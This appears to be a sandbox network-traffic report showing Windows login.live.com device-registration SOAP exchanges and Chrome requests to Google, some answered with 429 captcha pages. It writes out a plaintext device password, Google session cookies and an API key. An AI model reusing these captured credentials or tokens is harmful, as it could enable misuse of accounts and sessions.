2024-04-26 21:15:12 UTC | 7642 | OUT | Data Ascii: <DeviceAddRequest><ClientInfo name="IDCRL" version="1.0"><BinaryVersion>24</BinaryVersion></ClientInfo><Authentication><Membername>02vtcqonzdemftoq</Membername><Password>cbAU8O5ZcXq,;I1fI7Lp</Password></Authentication><OldMembername>02vnquskfpppcivc</OldM
2024-04-26 21:15:14 UTC | 542 | IN | HTTP/1.1 200 OK
                                                                                                Cache-Control: no-store, no-cache
                                                                                                Pragma: no-cache
                                                                                                Content-Type: text/xml
                                                                                                Expires: Fri, 26 Apr 2024 21:14:13 GMT
                                                                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                x-ms-route-info: C542_SN1
                                                                                                x-ms-request-id: d8a8e60f-0be4-40bf-aaaf-9dc0d66c6c55
                                                                                                PPServer: PPV: 30 H: SN1PEPF0002F0A1 V: 0
                                                                                                X-Content-Type-Options: nosniff
                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                Date: Fri, 26 Apr 2024 21:15:13 GMT
                                                                                                Connection: close
                                                                                                Content-Length: 17166
2024-04-26 21:15:14 UTC | 15842 | IN | Data Ascii: <DeviceAddResponse Success="true"><success>true</success><puid>0018000F041BE07E</puid><DeviceTpmKeyState>3</DeviceTpmKeyState><License ContentID="3252b20c-d425-4711-8cc5-b2f53c830b76" ID="dac49998-5e32-4f8c-b479-8123f507f454" LicenseID="3252b20c-d425-4711
2024-04-26 21:15:14 UTC | 1324 | IN | Data Ascii: tp://www.w3.org/2000/09/xmldsig#enveloped-signature"/></Transforms><DigestMethod Algorithm="http://www.w3.org/2001/04/xmlenc#sha256"/><DigestValue>gtqwpR5fGDaoHsM7IWGKZgawXa0BPiGae5bIun/RQJA=</DigestValue></Reference></SignedInfo><SignatureValue>AF8oFR+Gf


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49707 | 40.126.28.23 | 443
Timestamp | Bytes transferred | Direction | Data
2024-04-26 21:15:12 UTC | 422 | OUT | POST /RST2.srf HTTP/1.0
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: application/soap+xml
                                                                                                Accept: */*
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                Content-Length: 3592
                                                                                                Host: login.live.com
2024-04-26 21:15:12 UTC | 3592 | OUT | Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-04-26 21:15:13 UTC | 568 | IN | HTTP/1.1 200 OK
                                                                                                Cache-Control: no-store, no-cache
                                                                                                Pragma: no-cache
                                                                                                Content-Type: application/soap+xml; charset=utf-8
                                                                                                Expires: Fri, 26 Apr 2024 21:14:13 GMT
                                                                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                x-ms-route-info: C555_SN1
                                                                                                x-ms-request-id: a3fdef74-b352-44b2-8c29-03b033f73098
                                                                                                PPServer: PPV: 30 H: SN1PEPF0002F939 V: 0
                                                                                                X-Content-Type-Options: nosniff
                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                Date: Fri, 26 Apr 2024 21:15:12 GMT
                                                                                                Connection: close
                                                                                                Content-Length: 1276
2024-04-26 21:15:13 UTC | 1276 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49715 | 142.250.217.228 | 443 | 7284 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-26 21:15:13 UTC | 615 | OUT | GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
                                                                                                Host: www.google.com
                                                                                                Connection: keep-alive
                                                                                                X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                                                                Sec-Fetch-Site: none
                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                Sec-Fetch-Dest: empty
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
2024-04-26 21:15:14 UTC | 1703 | IN | HTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:15:13 GMT
                                                                                                Pragma: no-cache
                                                                                                Expires: -1
                                                                                                Cache-Control: no-cache, must-revalidate
                                                                                                Content-Type: text/javascript; charset=UTF-8
                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-ge1NLg22yyjYAbxe_r776w' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                Accept-CH: Sec-CH-UA-Platform
                                                                                                Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                Accept-CH: Sec-CH-UA-Full-Version
                                                                                                Accept-CH: Sec-CH-UA-Arch
                                                                                                Accept-CH: Sec-CH-UA-Model
                                                                                                Accept-CH: Sec-CH-UA-Bitness
                                                                                                Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                Accept-CH: Sec-CH-UA-WoW64
                                                                                                Permissions-Policy: unload=()
                                                                                                Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                                Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                                Content-Disposition: attachment; filename="f.txt"
                                                                                                Server: gws
                                                                                                X-XSS-Protection: 0
                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                Accept-Ranges: none
                                                                                                Vary: Accept-Encoding
                                                                                                Connection: close
                                                                                                Transfer-Encoding: chunked
2024-04-26 21:15:14 UTC | 1703 | IN | Data Ascii: 1308)]}'["",["nyt connections hints april 26","ps5 games","starbucks drinks half off","marvin harrison jr nfl draft","weather storms tornadoes","shamrock golden retriever puppy","horse racing kentucky derby","bluey"],["","","","","","","",""],[],{"goog
                                                                                                2024-04-26 21:15:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49712 | 142.250.217.228 | 443 | 7284 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-26 21:15:13 UTC | 353 | OUT | GET /async/ddljson?async=ntp:2 HTTP/1.1
                                                                                                Host: www.google.com
                                                                                                Connection: keep-alive
                                                                                                Sec-Fetch-Site: none
                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                Sec-Fetch-Dest: empty
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49713 | 142.250.217.228 | 443 | 7284 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-26 21:15:13 UTC | 518 | OUT | GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                Host: www.google.com
                                                                                                Connection: keep-alive
                                                                                                X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                                                                Sec-Fetch-Site: cross-site
                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                Sec-Fetch-Dest: empty
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
2024-04-26 21:15:14 UTC | 1843 | IN | HTTP/1.1 302 Found
                                                                                                Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjcGOKysLEGIjCpcmGUPeBLMAxrx6A3m-HmimiV3M4DW_xd1u12h5Ub_NV02_HrDnvzsp-9u9svldcyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                                x-hallmonitor-challenge: CgwI4rKwsQYQ4PHPqgMSBGaBmNw
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                Permissions-Policy: unload=()
                                                                                                Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                                Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                Date: Fri, 26 Apr 2024 21:15:14 GMT
                                                                                                Server: gws
                                                                                                Content-Length: 458
                                                                                                X-XSS-Protection: 0
                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                Set-Cookie: 1P_JAR=2024-04-26-21; expires=Sun, 26-May-2024 21:15:14 GMT; path=/; domain=.google.com; Secure; SameSite=none
                                                                                                Set-Cookie: NID=513=iUbBItZEW1h9amqUCm-KlYYhUIWeqsQ-pyJCcIdxTCwI2Ropvo3Hc9FAP8Xr8raOcU33zduC6ZvjFdbUkgavSWY0lo4ktRb8u9usg1jM0aopnGGmEjDXpvdjAeem68SbRavEfJYg9gkbI9h6q3nWksMOH4Z5LlB6B2SLfnqIyiE; expires=Sat, 26-Oct-2024 21:15:14 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                Connection: close
2024-04-26 21:15:14 UTC | 458 | IN
                                                                                                Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fh


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
6 | 192.168.2.5 | 49714 | 142.250.217.228 | 443 | 7284 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-26 21:15:13 UTC | 353 | OUT | GET /async/newtab_promos HTTP/1.1
                                                                                                Host: www.google.com
                                                                                                Connection: keep-alive
                                                                                                Sec-Fetch-Site: cross-site
                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                Sec-Fetch-Dest: empty
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
2024-04-26 21:15:14 UTC | 1761 | IN | HTTP/1.1 302 Found
                                                                                                Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjcGOKysLEGIjDP9RPIyWXG6yqz56jt32vlp9eant7g-v2niK8akWf-XW5L6XSYUi8PVE7hkJBYZJgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
                                                                                                x-hallmonitor-challenge: CgwI4rKwsQYQ6uOupQESBGaBmNw
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                Permissions-Policy: unload=()
                                                                                                Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
                                                                                                Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
                                                                                                P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                Date: Fri, 26 Apr 2024 21:15:14 GMT
                                                                                                Server: gws
                                                                                                Content-Length: 417
                                                                                                X-XSS-Protection: 0
                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                Set-Cookie: 1P_JAR=2024-04-26-21; expires=Sun, 26-May-2024 21:15:14 GMT; path=/; domain=.google.com; Secure; SameSite=none
                                                                                                Set-Cookie: NID=513=oetjuYuWwh2Fnv2QCWQRQPLZcsDTMDuVhCmk6WPzj9-iNMKJAjgm_D0WAGx_GU56bZRVY9hBHFVYhs_K7NfQENKIkt1Vyb-R18VFLUl-d5WiAfiWh4o-5GgypGmldDtdqVf6N3H_QKNhkPytT1_buTY1iY518dBDIDJl92-nhjw; expires=Sat, 26-Oct-2024 21:15:14 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                Connection: close
2024-04-26 21:15:14 UTC | 417 | IN
                                                                                                Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
7 | 192.168.2.5 | 49719 | 142.250.217.228 | 443 | 7284 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-26 21:15:16 UTC | 738 | OUT | GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjcGOKysLEGIjDP9RPIyWXG6yqz56jt32vlp9eant7g-v2niK8akWf-XW5L6XSYUi8PVE7hkJBYZJgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                                                                Host: www.google.com
                                                                                                Connection: keep-alive
                                                                                                Sec-Fetch-Site: cross-site
                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                Sec-Fetch-Dest: empty
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Cookie: 1P_JAR=2024-04-26-21; NID=513=iUbBItZEW1h9amqUCm-KlYYhUIWeqsQ-pyJCcIdxTCwI2Ropvo3Hc9FAP8Xr8raOcU33zduC6ZvjFdbUkgavSWY0lo4ktRb8u9usg1jM0aopnGGmEjDXpvdjAeem68SbRavEfJYg9gkbI9h6q3nWksMOH4Z5LlB6B2SLfnqIyiE
2024-04-26 21:15:16 UTC | 356 | IN | HTTP/1.1 429 Too Many Requests
                                                                                                Date: Fri, 26 Apr 2024 21:15:16 GMT
                                                                                                Pragma: no-cache
                                                                                                Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Content-Type: text/html
                                                                                                Server: HTTP server (unknown)
                                                                                                Content-Length: 3114
                                                                                                X-XSS-Protection: 0
                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                Connection: close
2024-04-26 21:15:16 UTC | 899 | IN
                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_promos</title></head
2024-04-26 21:15:16 UTC | 1255 | IN
                                                                                                Data Ascii: ack = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="3cf2lbR1hUjmxv5rmL4g8hhKJ40_S3vOX
2024-04-26 21:15:16 UTC | 960 | IN
                                                                                                Data Ascii: ogle automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly after those requests stop. In the meantime, solvin


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
8 | 192.168.2.5 | 49721 | 142.250.217.228 | 443 | 7284 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-26 21:15:16 UTC | 920 | OUT | GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjcGOKysLEGIjCpcmGUPeBLMAxrx6A3m-HmimiV3M4DW_xd1u12h5Ub_NV02_HrDnvzsp-9u9svldcyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
                                                                                                Host: www.google.com
                                                                                                Connection: keep-alive
                                                                                                X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCLnKzQEIv9HNAQiK080BCNDWzQEIqNjNAQj5wNQVGI/OzQEYutLNARjC2M0BGOuNpRc=
                                                                                                Sec-Fetch-Site: cross-site
                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                Sec-Fetch-Dest: empty
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                Cookie: 1P_JAR=2024-04-26-21; NID=513=iUbBItZEW1h9amqUCm-KlYYhUIWeqsQ-pyJCcIdxTCwI2Ropvo3Hc9FAP8Xr8raOcU33zduC6ZvjFdbUkgavSWY0lo4ktRb8u9usg1jM0aopnGGmEjDXpvdjAeem68SbRavEfJYg9gkbI9h6q3nWksMOH4Z5LlB6B2SLfnqIyiE
2024-04-26 21:15:16 UTC | 356 | IN | HTTP/1.1 429 Too Many Requests
                                                                                                Date: Fri, 26 Apr 2024 21:15:16 GMT
                                                                                                Pragma: no-cache
                                                                                                Expires: Fri, 01 Jan 1990 00:00:00 GMT
                                                                                                Cache-Control: no-store, no-cache, must-revalidate
                                                                                                Content-Type: text/html
                                                                                                Server: HTTP server (unknown)
                                                                                                Content-Length: 3186
                                                                                                X-XSS-Protection: 0
                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                Connection: close
2024-04-26 21:15:16 UTC | 899 | IN
                                                                                                Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_ogb?hl=en-US&amp;asy
2024-04-26 21:15:16 UTC | 1255 | IN
                                                                                                Data Ascii: <script>var submitCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="HLVEJPa0q
2024-04-26 21:15:16 UTC | 1032 | IN
                                                                                                Data Ascii: ; line-height:1.4em;">This page appears when Google automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly aft


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.5 | 49722 | 40.126.28.23 | 443 | |
Timestamp | Bytes transferred | Direction | Data
2024-04-26 21:15:16 UTC | 422 | OUT | POST /RST2.srf HTTP/1.0
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: application/soap+xml
                                                                                                Accept: */*
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                Content-Length: 3592
                                                                                                Host: login.live.com
                                                                                                2024-04-26 21:15:16 UTC | 3592 | OUT | Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                2024-04-26 21:15:17 UTC | 569 | IN | HTTP/1.1 200 OK
                                                                                                Cache-Control: no-store, no-cache
                                                                                                Pragma: no-cache
                                                                                                Content-Type: application/soap+xml; charset=utf-8
                                                                                                Expires: Fri, 26 Apr 2024 21:14:16 GMT
                                                                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                x-ms-route-info: C511_SN1
                                                                                                x-ms-request-id: de44254f-becc-4987-86a6-cc14c9a2ec9f
                                                                                                PPServer: PPV: 30 H: SN1PEPF0002F1B5 V: 0
                                                                                                X-Content-Type-Options: nosniff
                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                Date: Fri, 26 Apr 2024 21:15:16 GMT
                                                                                                Connection: close
                                                                                                Content-Length: 11393
                                                                                                2024-04-26 21:15:17 UTC | 11393 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                10 | 192.168.2.5 | 49725 | 40.126.28.23 | 443
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:15:19 UTC | 422 | OUT | POST /RST2.srf HTTP/1.0
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: application/soap+xml
                                                                                                Accept: */*
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                Content-Length: 3592
                                                                                                Host: login.live.com
                                                                                                2024-04-26 21:15:19 UTC | 3592 | OUT | Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                2024-04-26 21:15:19 UTC | 569 | IN | HTTP/1.1 200 OK
                                                                                                Cache-Control: no-store, no-cache
                                                                                                Pragma: no-cache
                                                                                                Content-Type: application/soap+xml; charset=utf-8
                                                                                                Expires: Fri, 26 Apr 2024 21:14:19 GMT
                                                                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                x-ms-route-info: C511_SN1
                                                                                                x-ms-request-id: 771685e9-df93-499c-a8b2-98880e4285bb
                                                                                                PPServer: PPV: 30 H: SN1PEPF0002F91A V: 0
                                                                                                X-Content-Type-Options: nosniff
                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                Date: Fri, 26 Apr 2024 21:15:19 GMT
                                                                                                Connection: close
                                                                                                Content-Length: 11393
                                                                                                2024-04-26 21:15:19 UTC | 11393 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                11 | 192.168.2.5 | 49726 | 40.126.28.23 | 443
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:15:20 UTC | 422 | OUT | POST /RST2.srf HTTP/1.0
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: application/soap+xml
                                                                                                Accept: */*
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                Content-Length: 4775
                                                                                                Host: login.live.com
